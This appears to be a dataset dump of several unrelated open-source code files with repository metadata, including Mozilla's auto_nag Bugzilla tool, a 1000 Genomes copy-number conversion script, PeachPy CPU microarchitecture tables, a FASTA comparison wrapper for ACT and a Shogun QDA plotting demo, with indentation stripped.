def visit_TmTrue(self, ctx):
print("true", end="")
def visit_TmFalse(self, ctx):
print("false", end="")
def visit_TmIf(self):
print("if", end="")
printtm(self.term_condition)
print(" then ", end="")
printtm(self.term_then)
print(" else")
printtm = TermsPrinter.visit
|
habibutsu/tapl-py
|
rcdsubbot/syntax.py
|
Python
|
mit
| 5,635
|
[
"VisIt"
] |
303e01c31e90b6d68255357a85c9eea18025c197c28fc4ae9ed8df3230341ac9
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import inspect
import os
import time
import six
from dateutil.relativedelta import relativedelta
from jinja2 import Environment, FileSystemLoader
from libmozdata import utils as lmdutils
from libmozdata.bugzilla import Bugzilla
from auto_nag import db, logger, mail, utils
from auto_nag.cache import Cache
from auto_nag.nag_me import Nag
class BzCleaner(object):
def __init__(self):
super(BzCleaner, self).__init__()
self._set_tool_name()
self.has_autofix = False
self.no_manager = set()
self.auto_needinfo = {}
self.has_flags = False
self.cache = Cache(self.name(), self.max_days_in_cache())
self.test_mode = utils.get_config("common", "test", False)
self.versions = None
logger.info("Run tool {}".format(self.get_tool_path()))
def _is_a_bzcleaner_init(self, info):
if info[3] == "__init__":
frame = info[0]
args = inspect.getargvalues(frame)
if "self" in args.locals:
zelf = args.locals["self"]
return isinstance(zelf, BzCleaner)
return False
def _set_tool_name(self):
stack = inspect.stack()
init = [s for s in stack if self._is_a_bzcleaner_init(s)]
last = init[-1]
info = inspect.getframeinfo(last[0])
base = os.path.dirname(__file__)
scripts = os.path.join(base, "scripts")
self.__tool_path__ = os.path.relpath(info.filename, scripts)
name = os.path.basename(info.filename)
name = os.path.splitext(name)[0]
self.__tool_name__ = name
def init_versions(self):
self.versions = utils.get_checked_versions()
return bool(self.versions)
def max_days_in_cache(self):
"""Get the max number of days the data must be kept in cache"""
return self.get_config("max_days_in_cache", -1)
def preamble(self):
return None
def description(self):
"""Get the description for the help"""
return ""
def name(self):
"""Get the tool name"""
return self.__tool_name__
def get_tool_path(self):
"""Get the tool path"""
return self.__tool_path__
def needinfo_template(self):
"""Get the txt template filename"""
return self.name() + "_needinfo.txt"
def template(self):
"""Get the html template filename"""
return self.name() + ".html"
def subject(self):
"""Get the partial email subject"""
return self.description()
def get_email_subject(self, date):
"""Get the email subject with a date or not"""
af = "[autofix]" if self.has_autofix else ""
if date:
return "[autonag]{} {} for the {}".format(af, self.subject(), date)
return "[autonag]{} {}".format(af, self.subject())
def ignore_date(self):
"""Should we ignore the date ?"""
return False
def must_run(self, date):
"""Check if the tool must run for this date"""
return True
def has_enough_data(self):
"""Check if the tool has enough data to run"""
if self.versions is None:
# init_versions() has never been called
return True
return bool(self.versions)
def filter_no_nag_keyword(self):
"""If True, then remove the bugs with [no-nag] in whiteboard from the bug list"""
return True
def add_no_manager(self, bugid):
self.no_manager.add(str(bugid))
def has_assignee(self):
return False
def has_needinfo(self):
return False
def get_mail_to_auto_ni(self, bug):
return None
def all_include_fields(self):
return False
def get_max_ni(self):
return -1
def ignore_meta(self):
return False
def columns(self):
"""The fields to get for the columns in email report"""
return ["id", "summary"]
def sort_columns(self):
"""Returns the key to sort columns"""
return None
def get_dates(self, date):
"""Get the dates for the bugzilla query (changedafter and changedbefore fields)"""
date = lmdutils.get_date_ymd(date)
lookup = self.get_config("days_lookup", 7)
start_date = date - relativedelta(days=lookup)
end_date = date + relativedelta(days=1)
return start_date, end_date
def get_extra_for_template(self):
"""Get extra data to put in the template"""
return {}
def get_extra_for_needinfo_template(self):
"""Get extra data to put in the needinfo template"""
return {}
def get_config(self, entry, default=None):
return utils.get_config(self.name(), entry, default=default)
def get_bz_params(self, date):
"""Get the Bugzilla parameters for the search query"""
return {}
def get_data(self):
"""Get the data structure to use in the bughandler"""
return {}
def get_summary(self, bug):
return "..." if bug["groups"] else bug["summary"]
def has_default_products(self):
return True
def has_product_component(self):
return False
def get_product_component(self):
return self.prod_comp
def get_max_years(self):
return self.get_config("max-years", -1)
def has_access_to_sec_bugs(self):
return self.get_config("sec", True)
def handle_bug(self, bug, data):
"""Implement this function to get all the bugs from the query"""
return bug
def get_db_extra(self):
"""Get extra information required for db insertion"""
return {
bugid: ni_mail
for ni_mail, v in self.auto_needinfo.items()
for bugid in v["bugids"]
}
def get_auto_ni_skiplist(self):
return set()
def add_auto_ni(self, bugid, data):
if not data:
return
ni_mail = data["mail"]
if ni_mail in self.get_auto_ni_skiplist():
return
if ni_mail in self.auto_needinfo:
max_ni = self.get_max_ni()
info = self.auto_needinfo[ni_mail]
if max_ni <= 0 or len(info["bugids"]) < max_ni:
info["bugids"].append(str(bugid))
else:
self.auto_needinfo[ni_mail] = {
"nickname": data["nickname"],
"bugids": [str(bugid)],
}
def get_receivers(self):
receivers = self.get_config("receivers")
if isinstance(receivers, six.string_types):
receivers = utils.get_config("common", "receiver_list", default={})[
receivers
]
return receivers
def bughandler(self, bug, data):
"""bug handler for the Bugzilla query"""
if bug["id"] in self.cache:
return
if self.handle_bug(bug, data) is None:
return
bugid = str(bug["id"])
res = {"id": bugid}
auto_ni = self.get_mail_to_auto_ni(bug)
self.add_auto_ni(bugid, auto_ni)
res["summary"] = self.get_summary(bug)
if self.has_assignee():
real = bug["assigned_to_detail"]["real_name"]
if utils.is_no_assignee(bug["assigned_to"]):
real = "nobody"
if real.strip() == "":
real = bug["assigned_to_detail"]["name"]
if real.strip() == "":
real = bug["assigned_to_detail"]["email"]
res["assignee"] = real
if self.has_needinfo():
s = set()
for flag in utils.get_needinfo(bug):
s.add(flag["requestee"])
res["needinfos"] = sorted(s)
if self.has_product_component():
for k in ["product", "component"]:
res[k] = bug[k]
if isinstance(self, Nag):
bug = self.set_people_to_nag(bug, res)
if not bug:
return
if bugid in data:
data[bugid].update(res)
else:
data[bugid] = res
def amend_bzparams(self, params, bug_ids):
"""Amend the Bugzilla params"""
if not self.all_include_fields():
if "include_fields" in params:
fields = params["include_fields"]
if isinstance(fields, list):
if "id" not in fields:
fields.append("id")
elif isinstance(fields, six.string_types):
if fields != "id":
params["include_fields"] = [fields, "id"]
else:
params["include_fields"] = [fields, "id"]
else:
params["include_fields"] = ["id"]
params["include_fields"] += ["summary", "groups"]
if self.has_assignee() and "assigned_to" not in params["include_fields"]:
params["include_fields"].append("assigned_to")
if self.has_product_component():
if "product" not in params["include_fields"]:
params["include_fields"].append("product")
if "component" not in params["include_fields"]:
params["include_fields"].append("component")
if self.has_needinfo() and "flags" not in params["include_fields"]:
params["include_fields"].append("flags")
if bug_ids:
params["bug_id"] = bug_ids
if self.filter_no_nag_keyword():
n = utils.get_last_field_num(params)
params.update(
{
"f" + n: "status_whiteboard",
"o" + n: "notsubstring",
"v" + n: "[no-nag]",
}
)
if self.ignore_meta():
n = utils.get_last_field_num(params)
params.update({"f" + n: "keywords", "o" + n: "nowords", "v" + n: "meta"})
# Limit the checkers to X years. Unlimited if max_years = -1
max_years = self.get_max_years()
if max_years > 0:
n = utils.get_last_field_num(params)
params.update(
{
f"f{n}": "creation_ts",
f"o{n}": "greaterthan",
f"v{n}": f"-{max_years}y",
}
)
if self.has_default_products():
params["product"] = self.get_config("products")
if not self.has_access_to_sec_bugs():
n = utils.get_last_field_num(params)
params.update({"f" + n: "bug_group", "o" + n: "isempty"})
self.has_flags = "flags" in params.get("include_fields", [])
def get_bugs(self, date="today", bug_ids=[], chunk_size=None):
"""Get the bugs"""
bugs = self.get_data()
params = self.get_bz_params(date)
self.amend_bzparams(params, bug_ids)
self.query_url = utils.get_bz_search_url(params)
if isinstance(self, Nag):
self.query_params = params
old_CHUNK_SIZE = Bugzilla.BUGZILLA_CHUNK_SIZE
try:
if chunk_size:
Bugzilla.BUGZILLA_CHUNK_SIZE = chunk_size
Bugzilla(
params,
bughandler=self.bughandler,
bugdata=bugs,
timeout=self.get_config("bz_query_timeout"),
).get_data().wait()
finally:
Bugzilla.BUGZILLA_CHUNK_SIZE = old_CHUNK_SIZE
self.get_comments(bugs)
return bugs
def commenthandler(self, bug, bugid, data):
return
def _commenthandler(self, bug, bugid, data):
comments = bug["comments"]
bugid = str(bugid)
if self.has_last_comment_time():
if comments:
data[bugid]["last_comment"] = utils.get_human_lag(comments[-1]["time"])
else:
data[bugid]["last_comment"] = ""
self.commenthandler(bug, bugid, data)
def get_comments(self, bugs):
"""Get the bugs comments"""
if self.has_last_comment_time():
bugids = self.get_list_bugs(bugs)
Bugzilla(
bugids=bugids, commenthandler=self._commenthandler, commentdata=bugs
).get_data().wait()
return bugs
def has_last_comment_time(self):
return False
def get_list_bugs(self, bugs):
return [x["id"] for x in bugs.values()]
def get_documentation(self):
return "For more information, please visit [auto_nag documentation](https://wiki.mozilla.org/Release_Management/autonag#{}).".format(
self.get_tool_path().replace("/", ".2F")
)
def has_bot_set_ni(self, bug):
if not self.has_flags:
raise Exception
return utils.has_bot_set_ni(bug)
def set_needinfo(self):
if not self.auto_needinfo:
return {}
template_name = self.needinfo_template()
assert bool(template_name)
env = Environment(loader=FileSystemLoader("templates"))
template = env.get_template(template_name)
res = {}
doc = self.get_documentation()
for ni_mail, info in self.auto_needinfo.items():
nick = info["nickname"]
for bugid in info["bugids"]:
comment = template.render(
nickname=nick,
extra=self.get_extra_for_needinfo_template(),
plural=utils.plural,
bugid=bugid,
documentation=doc,
)
comment = comment.strip() + "\n"
data = {
"comment": {"body": comment},
"flags": [
{
"name": "needinfo",
"requestee": ni_mail,
"status": "?",
"new": "true",
}
],
}
res[bugid] = data
return res
def has_individual_autofix(self, changes):
# check if we have a dictionary with bug numbers as keys
# return True if all the keys are bug number
# (which means that each bug has its own autofix)
return changes and all(
isinstance(bugid, six.integer_types) or bugid.isdigit() for bugid in changes
)
def get_autofix_change(self):
"""Get the change to do to autofix the bugs"""
return {}
def autofix(self, bugs):
"""Autofix the bugs according to what is returned by get_autofix_change"""
ni_changes = self.set_needinfo()
change = self.get_autofix_change()
if not ni_changes and not change:
return bugs
self.has_autofix = True
new_changes = {}
if not self.has_individual_autofix(change):
bugids = self.get_list_bugs(bugs)
for bugid in bugids:
new_changes[bugid] = utils.merge_bz_changes(
change, ni_changes.get(bugid, {})
)
else:
change = {str(k): v for k, v in change.items()}
bugids = set(change.keys()) | set(ni_changes.keys())
for bugid in bugids:
mrg = utils.merge_bz_changes(
change.get(bugid, {}), ni_changes.get(bugid, {})
)
if mrg:
new_changes[bugid] = mrg
if self.dryrun or self.test_mode:
for bugid, ch in new_changes.items():
logger.info(
"The bugs: {}\n will be autofixed with:\n{}".format(bugid, ch)
)
else:
extra = self.get_db_extra()
max_retries = utils.get_config("common", "bugzilla_max_retries", 3)
for bugid, ch in new_changes.items():
added = False
for _ in range(max_retries):
failures = Bugzilla([str(bugid)]).put(ch)
if failures:
time.sleep(1)
else:
added = True
db.BugChange.add(self.name(), bugid, extra=extra.get(bugid, ""))
break
if not added:
self.failure_callback(bugid)
logger.error(
"{}: Cannot put data for bug {} (change => {}).".format(
self.name(), bugid, ch
)
)
return bugs
def failure_callback(self, bugid):
"""Called on Bugzilla.put failures"""
return
def terminate(self):
"""Called when everything is done"""
return
def organize(self, bugs):
return utils.organize(bugs, self.columns(), key=self.sort_columns())
def add_to_cache(self, bugs):
"""Add the bug keys to cache"""
if isinstance(bugs, dict):
self.cache.add(bugs.keys())
else:
self.cache.add(bugs)
def get_email(self, date, bug_ids=[]):
"""Get title and body for the email"""
bugs = self.get_bugs(date=date, bug_ids=bug_ids)
bugs = self.autofix(bugs)
self.add_to_cache(bugs)
if bugs:
bugs = self.organize(bugs)
extra = self.get_extra_for_template()
env = Environment(loader=FileSystemLoader("templates"))
template = env.get_template(self.template())
message = template.render(
date=date,
data=bugs,
extra=extra,
str=str,
enumerate=enumerate,
plural=utils.plural,
no_manager=self.no_manager,
table_attrs=self.get_config("table_attrs"),
preamble=self.preamble(),
)
common = env.get_template("common.html")
body = common.render(message=message, query_url=self.query_url)
return self.get_email_subject(date), body
return None, None
def send_email(self, date="today"):
"""Send the email"""
if date:
date = lmdutils.get_date(date)
d = lmdutils.get_date_ymd(date)
if isinstance(self, Nag):
self.nag_date = d
if not self.must_run(d):
return
if not self.has_enough_data():
logger.info("The tool {} hasn't enough data to run".format(self.name()))
return
login_info = utils.get_login_info()
title, body = self.get_email(date)
if title:
receivers = self.get_receivers()
status = "Success"
try:
mail.send(
login_info["ldap_username"],
receivers,
title,
body,
html=True,
login=login_info,
dryrun=self.dryrun,
)
except Exception:
logger.exception("Tool {}".format(self.name()))
status = "Failure"
db.Email.add(self.name(), receivers, "global", status)
if isinstance(self, Nag):
self.send_mails(title, dryrun=self.dryrun)
else:
name = self.name().upper()
if date:
logger.info("{}: No data for {}".format(name, date))
else:
logger.info("{}: No data".format(name))
logger.info("Query: {}".format(self.query_url))
def add_custom_arguments(self, parser):
pass
def parse_custom_arguments(self, args):
pass
def get_args_parser(self):
"""Get the argumends from the command line"""
parser = argparse.ArgumentParser(description=self.description())
parser.add_argument(
"-d",
"--dryrun",
dest="dryrun",
action="store_true",
help="Just do the query, and print emails to console without emailing anyone",
)
if not self.ignore_date():
parser.add_argument(
"-D",
"--date",
dest="date",
action="store",
default="today",
help="Date for the query",
)
self.add_custom_arguments(parser)
return parser
def run(self):
"""Run the tool"""
args = self.get_args_parser().parse_args()
self.parse_custom_arguments(args)
date = "" if self.ignore_date() else args.date
self.dryrun = args.dryrun
self.cache.set_dry_run(self.dryrun)
try:
self.send_email(date=date)
self.terminate()
logger.info("Tool {} has finished.".format(self.get_tool_path()))
except Exception:
logger.exception("Tool {}".format(self.name()))
|
mozilla/bztools
|
auto_nag/bzcleaner.py
|
Python
|
bsd-3-clause
| 21,123
|
[
"VisIt"
] |
fbb4a4d0bf00a22ce72b3246113428fe500e1fe0f7cb6642d9b6b94f7cb80f52
|
import pandas as pd
import numpy as np
import toolshed as ts
xl = pd.ExcelFile('data/nature08516-s4.xls')
gm = xl.parse("Genotype Map", index_col=0)
gm = gm[~np.isnan(gm.start)]
gm.chr = gm.chr.astype(int).astype(str)
gm.chr[gm.chr == "23"] = "X"
gm.start = gm.start.astype(int)
gm.end = gm.end.astype(int)
gm.drop('source', axis=1, inplace=True)
gm.drop('cn', axis=1, inplace=True)
gm.columns = (['#chrom'] + list(gm.columns[1:]))
print(gm.head())
j = gm
def get_bam_lookup(p="data/bam-lookups-from-1kg-site.tsv"):
l = {}
for d in ts.reader(p):
if 'low_coverage' in d['url']: continue
if 'chr20' in d['url']: continue
if 'chrom20' in d['url']: continue
if 'chrom11' in d['url']: continue
if 'unmapped' in d['url']: continue
# NOTE: we could also get some samples with cram.
if not d['url'].endswith('.bam'): continue
if d['Sample'] in l:
print "XXX:", d['url']
print "YYY:", l[d['Sample']]
l[d['Sample']] = d['url']
return l
samples = get_bam_lookup()
url = "ftp://ftp.1000genomes.ebi.ac.uk/vol1/ftp/phase3/data/{sample}/exome_alignment/{sample}.mapped.ILLUMINA.bwa.{pop}.exome.20120522.bam"
bamfh = open('data/samples.bams.txt', 'w')
for p in ('CEU', 'CHB+JPT', 'YRI'):
pop = xl.parse(p, index_col=0)
j = j.join(pop, how="inner")
for s in pop.columns[1:]:
if s in samples:
bamfh.write("%s\t%s\n" % (s, samples[s]))
bamfh.close()
j.sort_values(by=['#chrom', 'start'], inplace=True)
j.to_csv('data/copy-numbers.hg18.wide.bed', index=False,
float_format="%.0f", sep="\t", na_rep='nan')
jlong = pd.melt(j, id_vars=('#chrom', 'start', 'end'),
value_vars=list(j.columns[4:]), var_name='sample', value_name='cn')
print jlong.shape
jlong = jlong.ix[jlong.cn != 2, :]
jlong.sort_values(by=['#chrom', 'start'], inplace=True)
print jlong.shape
print jlong.head()
jlong.to_csv('data/copy-numbers.hg18.long.bed', index=False,
float_format="%.0f", sep="\t", na_rep='nan')
grouped = jlong.groupby(['#chrom','start', 'end', 'cn'], axis=0,
as_index=False)
short = grouped.agg(lambda col: ",".join(col))
print short.__class__
short.sort_values(by=['#chrom', 'start', 'cn'], inplace=True)
short.to_csv('data/copy-numbers.hg18.samples.bed', index=False,
float_format="%.0f", sep="\t", na_rep='nan')
|
brentp/bio-playground
|
1kg-cnv/scripts/truth-xls-to-tsv.py
|
Python
|
mit
| 2,379
|
[
"BWA"
] |
f416a71ce800eeeeaee08af33a3221eaee51dfdb43be3f416920651958028f96
|
# This file is part of Peach-Py package and is licensed under the Simplified BSD license.
# See license.rst for the full text of the license.
from peachpy.x86_64 import isa
class Microarchitecture:
def __init__(self, name, extensions, alu_width, fpu_width, load_with, store_width):
self.name = name
self.extensions = isa.Extensions(*[prerequisite for extension in extensions
for prerequisite in extension.prerequisites])
self.alu_width = alu_width
self.fpu_width = fpu_width
self.load_width = load_with
self.store_width = store_width
def is_supported(self, extension):
return extension in self.extensions
@property
def id(self):
return self.name.replace(" ", "")
@property
def has_sse3(self):
return isa.sse3 in self.extensions
@property
def has_ssse3(self):
return isa.ssse3 in self.extensions
@property
def has_sse4_1(self):
return isa.sse4_1 in self.extensions
@property
def has_sse4_2(self):
return isa.sse4_2 in self.extensions
@property
def has_avx(self):
return isa.avx in self.extensions
@property
def has_avx2(self):
return isa.avx2 in self.extensions
@property
def has_fma3(self):
return isa.fma3 in self.extensions
@property
def has_fma4(self):
return isa.fma4 in self.extensions
@property
def has_fma(self):
return self.has_fma3 or self.has_fma4
@property
def has_avx512f(self):
return isa.avx512f in self.extensions
def __add__(self, extension):
return Microarchitecture(self.name, self.extensions + extension,
self.alu_width, self.fpu_width, self.load_width, self.store_width)
def __sub__(self, extension):
return Microarchitecture(self.name, self.extensions - extension,
self.alu_width, self.fpu_width, self.load_width, self.store_width)
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return isinstance(other, Microarchitecture) and self.name == other.name
def __ne__(self, other):
return not isinstance(other, Microarchitecture) or self.name != other.name
def __str__(self):
return self.name
def __repr__(self):
return str(self)
default = Microarchitecture('Default', isa.default,
alu_width=128, fpu_width=128, load_with=128, store_width=128)
prescott = Microarchitecture('Prescott', (isa.cmov, isa.sse3),
alu_width=64, fpu_width=64, load_with=64, store_width=64)
conroe = Microarchitecture('Conroe', (isa.cmov, isa.mmx_plus, isa.ssse3),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
penryn = Microarchitecture('Penryn', (isa.cmov, isa.mmx_plus, isa.sse4_1),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
nehalem = Microarchitecture('Nehalem', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
sandy_bridge = Microarchitecture('Sandy Bridge', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx),
alu_width=128, fpu_width=256, load_with=256, store_width=128)
ivy_bridge = Microarchitecture('Ivy Bridge', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx, isa.f16c),
alu_width=128, fpu_width=256, load_with=256, store_width=128)
haswell = Microarchitecture('Haswell', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx, isa.f16c, isa.fma3,
isa.avx2, isa.lzcnt, isa.three_d_now_prefetch, isa.movbe, isa.bmi2),
alu_width=256, fpu_width=256, load_with=256, store_width=256)
broadwell = Microarchitecture('Broadwell', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.f16c, isa.fma3, isa.avx2,
isa.lzcnt, isa.three_d_now_prefetch, isa.movbe, isa.bmi2, isa.adx),
alu_width=256, fpu_width=256, load_with=256, store_width=256)
k8 = Microarchitecture('K8', (isa.cmov, isa.mmx_plus, isa.three_d_now_plus, isa.three_d_now_prefetch, isa.sse2),
alu_width=64, fpu_width=64, load_with=64, store_width=64)
k10 = Microarchitecture('K10', (isa.cmov, isa.mmx_plus, isa.three_d_now_plus, isa.three_d_now_prefetch, isa.sse4a,
isa.popcnt, isa.lzcnt),
alu_width=128, fpu_width=128, load_with=128, store_width=64)
bulldozer = Microarchitecture('Bulldozer', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.avx, isa.xop, isa.fma4,
isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq, isa.lzcnt, isa.popcnt),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
piledriver = Microarchitecture('Piledriver', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.sse4_2, isa.avx, isa.xop, isa.fma4,
isa.fma3, isa.f16c, isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq,
isa.lzcnt, isa.popcnt, isa.bmi, isa.tbm),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
steamroller = Microarchitecture('Steamroller', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.avx, isa.xop, isa.fma4, isa.fma3,
isa.f16c, isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq, isa.lzcnt,
isa.popcnt, isa.bmi, isa.tbm),
alu_width=128, fpu_width=256, load_with=256, store_width=128)
bonnell = Microarchitecture('Bonnell', (isa.cmov, isa.movbe, isa.mmx_plus, isa.ssse3),
alu_width=128, fpu_width=64, load_with=128, store_width=128)
saltwell = Microarchitecture('Saltwell', (isa.cmov, isa.movbe, isa.mmx_plus, isa.ssse3),
alu_width=128, fpu_width=64, load_with=128, store_width=128)
silvermont = Microarchitecture('Silvermont', (isa.cmov, isa.movbe, isa.popcnt, isa.mmx_plus, isa.sse4_2, isa.aes,
isa.pclmulqdq),
alu_width=128, fpu_width=64, load_with=128, store_width=128)
bobcat = Microarchitecture('Bobcat', (isa.cmov, isa.mmx_plus, isa.three_d_now_prefetch, isa.ssse3, isa.sse4a),
alu_width=64, fpu_width=64, load_with=64, store_width=64)
jaguar = Microarchitecture('Jaguar', (isa.cmov, isa.movbe, isa.lzcnt, isa.bmi, isa.popcnt, isa.three_d_now_prefetch,
isa.mmx_plus, isa.sse4_2, isa.sse4a, isa.avx, isa.f16c, isa.aes, isa.pclmulqdq),
alu_width=128, fpu_width=128, load_with=128, store_width=128)
|
pombredanne/PeachPy
|
peachpy/x86_64/uarch.py
|
Python
|
bsd-2-clause
| 7,017
|
[
"Jaguar"
] |
5446fe4afa8526827c08d9002ce83a2d01df3fa1121cd669eb9cad2c0281b6d0
|
#!/usr/bin/env python3
import sys
import argparse
import pyfastaq
import pymummer
import subprocess
import os
parser = argparse.ArgumentParser(
description = '''Compares FASTA files with blast or nucmer, writes input files for ACT.
Then start ACT. Files from top to bottom in ACT are same as order
listed on command line when this script is run.''',
usage = '%(prog)s [options] <blast|nucmer|promer> <outdir> <file1.fa> <file2.fa> [<file3.fa ...]')
parser.add_argument('--blast_ops', help='blastall options [%(default)s]', default='-p blastn -m 8 -F F -e 0.01 -b 10000 -v 10000')
parser.add_argument('--nucmer_ops', help='nucmer or promer options [promer:--maxmatch. nucmer: --maxmatch --nosimplify]')
parser.add_argument('--no_delta_filter', action='store_true')
parser.add_argument('--no_act', action='store_true', help='Do not start act, just make comparison files etc')
parser.add_argument('--delta_ops', help='delta-filter options [%(default)s]', default='-m')
parser.add_argument('aln_tool', help='blast, nucmer or promer')
parser.add_argument('outdir', help='Output directory (must not already exist)')
parser.add_argument('fa_list', help='List of fasta files', nargs=argparse.REMAINDER)
options = parser.parse_args()
assert len(options.fa_list) > 1
def index_to_union(ops, i):
return os.path.join(ops.outdir, 'infile.' + str(i) + '.union.fa')
def compare_with_blast(qry, ref, ops, outfile):
subprocess.check_output('formatdb -l ' + os.path.join(ops.outdir, '.formatdb.log') + ' -p F -i ' + ref, shell=True)
cmd = ' '.join([
'blastall', ops.blast_ops,
'-d', ref,
'-i', qry,
'-o', outfile
])
subprocess.check_output(cmd, shell=True)
def compare_with_nucmer(qry, ref, ops, outfile):
nucmer_out = outfile + '.nucmer.out'
delta_file = nucmer_out + '.delta'
filtered_file = delta_file + '.filter'
coords_file = filtered_file + '.coords'
if ops.nucmer_ops is None:
if ops.aln_tool == 'promer':
ops.nucmer_ops = '--maxmatch'
else:
ops.nucmer_ops = '--maxmatch --nosimplify'
cmd = ' '.join([
ops.aln_tool,
ops.nucmer_ops,
'-p', nucmer_out,
ref,
qry,
])
print('cmd:', cmd)
pyfastaq.utils.syscall(cmd)
if ops.no_delta_filter:
cmd = 'cp ' + delta_file + ' ' + filtered_file
else:
cmd = ' '.join([
'delta-filter',
ops.delta_ops,
delta_file,
'>', filtered_file,
])
print('cmd:', cmd)
pyfastaq.utils.syscall(cmd)
cmd = ' '.join([
'show-coords -dTlroH',
filtered_file,
'>', coords_file
])
print('cmd:', cmd)
pyfastaq.utils.syscall(cmd)
pyfastaq.utils.syscall('samtools faidx ' + qry)
pyfastaq.utils.syscall('samtools faidx ' + ref)
pymummer.coords_file.convert_to_msp_crunch(coords_file, outfile, qry + '.fai', ref + '.fai')
# check files exist
for i in range(len(options.fa_list)):
if not os.path.exists(options.fa_list[i]):
print('File not found:', options.fa_list[i], file=sys.stderr)
sys.exit(1)
options.fa_list[i] = os.path.abspath(options.fa_list[i])
try:
os.mkdir(options.outdir)
except:
print('Error making output directory', options.outdir)
sys.exit(1)
# make union files
for i in range(len(options.fa_list)):
seq = pyfastaq.sequences.Fasta('union', '')
reader = pyfastaq.sequences.file_reader(options.fa_list[i])
new_seq = []
for s in reader:
new_seq.append(s.seq)
f = pyfastaq.utils.open_file_write(index_to_union(options, i))
seq.seq = ''.join(new_seq)
print(seq, file=f)
pyfastaq.utils.close(f)
act_command = 'act ' + options.fa_list[0]
# run alignments
for i in range(len(options.fa_list)-1):
qry = index_to_union(options, i+1)
ref = index_to_union(options, i)
outfile = 'compare.' + str(i) + '.vs.' + str(i+1)
outfile_abs = os.path.join(options.outdir, outfile)
if options.aln_tool == 'blast':
compare_with_blast(qry, ref, options, outfile_abs)
elif options.aln_tool in ['nucmer', 'promer']:
compare_with_nucmer(qry, ref, options, outfile_abs)
else:
sys.exit('Unknown alignment tool:' + options.aln_tool)
act_command += ' ' + outfile + ' ' + options.fa_list[i+1]
# delete temporary union files
for i in range(len(options.fa_list)):
filename = index_to_union(options, i)
os.unlink(filename)
try:
os.unlink(filename + '.fai')
except:
pass
# write ACT script
try:
os.chdir(options.outdir)
except:
print('Error chdir', options.outdir)
sys.exit(1)
act_script = 'start_act.sh'
with open(act_script, 'w') as f:
print('#!/usr/bin/env bash', file=f)
print('set -e', file=f)
print('dir=$(dirname $0)', file=f)
print('cd $dir', file=f)
print(act_command, file=f)
os.chmod(act_script, 0o755)
if not options.no_act:
subprocess.check_output('./' + act_script, shell=True)
|
martinghunt/bioinf-scripts
|
python/multi_act.py
|
Python
|
mit
| 5,051
|
[
"BLAST"
] |
b0a67efe48ca5da2aa16db932adeb2b1104d132a7a43a3a376fe5e420fdcfa4c
|
"""
Shogun demo
Fernando J. Iglesias Garcia
"""
import numpy as np
import matplotlib as mpl
import pylab
import util
from scipy import linalg
from shogun.Classifier import QDA
from shogun.Features import RealFeatures, MulticlassLabels
# colormap
cmap = mpl.colors.LinearSegmentedColormap('color_classes',
{'red': [(0, 1, 1),
(1, .7, .7)],
'green': [(0, 1, 1),
(1, .7, .7)],
'blue': [(0, 1, 1),
(1, .7, .7)]})
pylab.cm.register_cmap(cmap = cmap)
# Generate data from Gaussian distributions
def gen_data():
np.random.seed(0)
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(N, dim), covs[0]) + np.array([-4, 3]),
np.dot(np.random.randn(N, dim), covs[1]) + np.array([-1, -5]),
np.dot(np.random.randn(N, dim), covs[2]) + np.array([3, 4])];
Y = np.hstack((np.zeros(N), np.ones(N), 2*np.ones(N)))
return X, Y
def plot_data(qda, X, y, y_pred, ax):
X0, X1, X2 = X[y == 0], X[y == 1], X[y == 2]
# Correctly classified
tp = (y == y_pred)
tp0, tp1, tp2 = tp[y == 0], tp[y == 1], tp[y == 2]
X0_tp, X1_tp, X2_tp = X0[tp0], X1[tp1], X2[tp2]
# Misclassified
X0_fp, X1_fp, X2_fp = X0[tp0 != True], X1[tp1 != True], X2[tp2 != True]
# Class 0 data
pylab.plot(X0_tp[:, 0], X0_tp[:, 1], 'o', color = cols[0])
pylab.plot(X0_fp[:, 0], X0_fp[:, 1], 's', color = cols[0])
m0 = qda.get_mean(0)
pylab.plot(m0[0], m0[1], 'o', color = 'black', markersize = 8)
# Class 1 data
pylab.plot(X1_tp[:, 0], X1_tp[:, 1], 'o', color = cols[1])
pylab.plot(X1_fp[:, 0], X1_fp[:, 1], 's', color = cols[1])
m1 = qda.get_mean(1)
pylab.plot(m1[0], m1[1], 'o', color = 'black', markersize = 8)
# Class 2 data
pylab.plot(X2_tp[:, 0], X2_tp[:, 1], 'o', color = cols[2])
pylab.plot(X2_fp[:, 0], X2_fp[:, 1], 's', color = cols[2])
m2 = qda.get_mean(2)
pylab.plot(m2[0], m2[1], 'o', color = 'black', markersize = 8)
def plot_cov(plot, mean, cov, color):
v, w = linalg.eigh(cov)
u = w[0] / linalg.norm(w[0])
angle = np.arctan(u[1] / u[0]) # rad
angle = 180 * angle / np.pi # degrees
# Filled gaussian at 2 standard deviation
ell = mpl.patches.Ellipse(mean, 2*v[0]**0.5, 2*v[1]**0.5, 180 + angle, color = color)
ell.set_clip_box(plot.bbox)
ell.set_alpha(0.5)
plot.add_artist(ell)
def plot_regions(qda):
nx, ny = 500, 500
x_min, x_max = pylab.xlim()
y_min, y_max = pylab.ylim()
xx, yy = np.meshgrid(np.linspace(x_min, x_max, nx),
np.linspace(y_min, y_max, ny))
dense = RealFeatures(np.array((np.ravel(xx), np.ravel(yy))))
dense_labels = qda.apply(dense).get_labels()
Z = dense_labels.reshape(xx.shape)
